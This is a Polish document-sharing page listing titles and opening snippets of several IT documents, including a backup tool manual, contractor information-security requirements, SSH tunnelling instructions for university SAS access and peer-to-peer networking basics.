Win Admin Replikator Instrukcja Obsługi Win Admin Replikator Instrukcja Obsługi Monitoring Kopie danych (backup) E-mail Harmonogram lokalne i zewnętrzne repozytorium Logi Pamięć Procesor HDD Administracja sprzętem i oprogramowaniem (automatyzacja

Bardziej szczegółowo

Wymagania w zakresie bezpieczeństwa informacji dla Wykonawców świadczących usługi na rzecz i terenie PSG sp. z o.o. Załącznik Nr 3 do Księgi ZSZ

Wymagania w zakresie bezpieczeństwa informacji dla Wykonawców świadczących usługi na rzecz i terenie PSG sp. z o.o. Załącznik Nr 3 do Księgi ZSZ Spis treści 1. Cel dokumentu... 1 2. Zakres... 1 3. Wykonawcy poruszający się po obiektach PSG.... 1 4. Przetwarzanie informacji udostępnionych przez Spółkę.... 2 5. Wykonawcy korzystający ze sprzętu komputerowego...

Bardziej szczegółowo

V4R3. SEE Electrical Expert V4R3 Sposoby zabezpieczenia programu

V4R3. SEE Electrical Expert V4R3 Sposoby zabezpieczenia programu V4R3 SEE Electrical Expert V4R3 Sposoby zabezpieczenia programu COPYRIGHT 1986-2018 IGE+XAO Wszelkie prawa zastrzeżone. Nieautoryzowane rozpowszechnianie całości lub fragmentu niniejszej publikacji w

Bardziej szczegółowo

1 Implementowanie i konfigurowanie infrastruktury wdraŝania systemu Windows... 1

1 Implementowanie i konfigurowanie infrastruktury wdraŝania systemu Windows... 1 Spis treści Wstęp... xi Wymagania sprzętowe (Virtual PC)... xi Wymagania sprzętowe (fizyczne)... xii Wymagania programowe... xiii Instrukcje instalowania ćwiczeń... xiii Faza 1: Tworzenie maszyn wirtualnych...

Bardziej szczegółowo

Praca z programami SAS poza lokalną siecią komputerową UZ. Zestawienie tunelu SSH oraz konfiguracja serwera proxy w przeglądarce WWW

Praca z programami SAS poza lokalną siecią komputerową UZ. Zestawienie tunelu SSH oraz konfiguracja serwera proxy w przeglądarce WWW Instytut Sterowania i Systemów Informatycznych Uniwersytet Zielonogórski Praca z programami SAS poza lokalną siecią komputerową UZ. Zestawienie tunelu SSH oraz konfiguracja serwera proxy w przeglądarce

Bardziej szczegółowo

Praca w sieci równorzędnej

Praca w sieci równorzędnej Praca w sieci równorzędnej 1. Architektura sieci równorzędnej i klient-serwer Serwer - komputer, który udostępnia zasoby lub usługi. Klient komputer lub urządzenie korzystające z udostępnionych przez serwer

Bardziej szczegółowo